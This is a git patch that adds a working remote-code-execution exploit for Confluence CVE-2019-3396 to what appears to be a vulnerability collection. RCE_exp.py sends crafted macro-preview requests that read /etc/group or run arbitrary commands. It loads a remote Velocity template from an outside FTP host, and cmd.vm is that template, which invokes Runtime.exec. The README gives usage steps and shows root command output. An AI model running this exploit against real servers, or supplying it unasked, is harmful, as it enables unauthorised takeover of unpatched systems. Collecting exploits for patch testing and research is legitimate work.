From 0766a5e57d88d38b1fdaf4fdd807c21bde2fb687 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Thu, 20 Oct 2022 14:00:40 +0800 Subject: [PATCH] ADD CVE-2019-3396 --- cve/confluence/2019/CVE-2019-3396/RCE_exp.py | 61 ++++++++++++++++++++ cve/confluence/2019/CVE-2019-3396/README.md | 9 +++ cve/confluence/2019/CVE-2019-3396/cmd.vm | 9 +++ cve/confluence/yaml/CVE-2019-3396.yaml | 23 ++++++++ vulnerability_list.yaml | 2 + 5 files changed, 104 insertions(+) create mode 100644 cve/confluence/2019/CVE-2019-3396/RCE_exp.py create mode 100644 cve/confluence/2019/CVE-2019-3396/README.md create mode 100644 cve/confluence/2019/CVE-2019-3396/cmd.vm create mode 100644 cve/confluence/yaml/CVE-2019-3396.yaml diff --git a/cve/confluence/2019/CVE-2019-3396/RCE_exp.py b/cve/confluence/2019/CVE-2019-3396/RCE_exp.py new file mode 100644 index 00000000..5517dfb1 --- /dev/null +++ b/cve/confluence/2019/CVE-2019-3396/RCE_exp.py @@ -0,0 +1,61 @@ +# -*- coding: utf-8 -*- +import re +import sys +import requests +import ssl +try: + _create_unverified_https_context = ssl._create_unverified_context +except AttributeError: + pass +else: + ssl._create_default_https_context = _create_unverified_https_context + +def _read(url): + result = {} + # filename = "../web.xml" + filename = 'file:////etc/group' + + paylaod = url + "/rest/tinymce/1/macro/preview" + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", + "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&", + "Content-Type": "application/json; charset=utf-8" + } + data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename + r = requests.post(paylaod, data=data, headers=headers) + # print r.content + if r.status_code == 200 and "wiki-content" in r.text: + m = re.findall('.*wiki-content">\n(.*)\n \n', r.text, re.S) + + return m[0] + + + +def _exec(url,cmd): + result = {} + filename = "ftp://1.1.1.1/cmd.vm" + + paylaod = url + "/rest/tinymce/1/macro/preview" + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", + "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&", + "Content-Type": "application/json; charset=utf-8" + } + data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"http://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"%s","cmd":"%s"}}}' % (filename,cmd) + r = requests.post(paylaod, data=data, headers=headers) + # print r.content + if r.status_code == 200 and "wiki-content" in r.text: + m = re.findall('.*wiki-content">\n(.*)\n \n', r.text, re.S) + + return m[0] + + + +if __name__ == '__main__': + + if len(sys.argv) != 3: + print 'Usage: RCE_exp.py http[s]://target.com:8080/ "ls -al"' + sys.exit(0) + url = sys.argv[1] + cmd = sys.argv[2] + print _exec(url,cmd) diff --git a/cve/confluence/2019/CVE-2019-3396/README.md b/cve/confluence/2019/CVE-2019-3396/README.md new file mode 100644 index 00000000..e89eb5fa --- /dev/null +++ b/cve/confluence/2019/CVE-2019-3396/README.md @@ -0,0 +1,9 @@ +# CVE-2019-3396_EXP +CVE-2019-3396 confluence SSTI RCE + +1、put the cmd.vm on your website (must use ftp or https ,http doesn't work ) +2、modify RCE_exp.py ,change the filename = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21) +3、python REC_exp.py http://test.wiki_test.cc:8080 "whoami" + +$ python REC_exp.py http://test.wiki_test.cc:8080 "id" +uid=0(root) gid=0(root) groups=0(root) diff --git a/cve/confluence/2019/CVE-2019-3396/cmd.vm b/cve/confluence/2019/CVE-2019-3396/cmd.vm new file mode 100644 index 00000000..7a18cc07 --- /dev/null +++ b/cve/confluence/2019/CVE-2019-3396/cmd.vm @@ -0,0 +1,9 @@ +#set ($e="exp") +#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) +#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) +#set($sc = $e.getClass().forName("java.util.Scanner")) +#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) +#set($scan=$constructor.newInstance($input).useDelimiter("\\A")) +#if($scan.hasNext()) + $scan.next() +#end diff --git a/cve/confluence/yaml/CVE-2019-3396.yaml b/cve/confluence/yaml/CVE-2019-3396.yaml new file mode 100644 index 00000000..e91ff6d3 --- /dev/null +++ b/cve/confluence/yaml/CVE-2019-3396.yaml @@ -0,0 +1,23 @@ +id: CVE-2019-3396 +source: +info: + name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。 + severity: critical + description: | + Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 + scope-of-influence: + 6.6.x≤ Confluence <6.6.12 + 6.12.x≤ Confluence <6.12.3 + 6.13.x≤ Confluence <6.13.13 + 6.14.x≤ Confluence <6.14.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-3396 + - https://jira.atlassian.com/browse/CONFSERVER-57974 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-3396 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None + tags: RCE,cve2019,任意文件读取 \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index 479880b2..f1290627 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -15,5 +15,7 @@ cve: - CVE-2021-3156 gitlab: - CVE-2021-22205 + confluence: + - CVE-2019-3396 cnvd: kve: \ No newline at end of file -- Gitee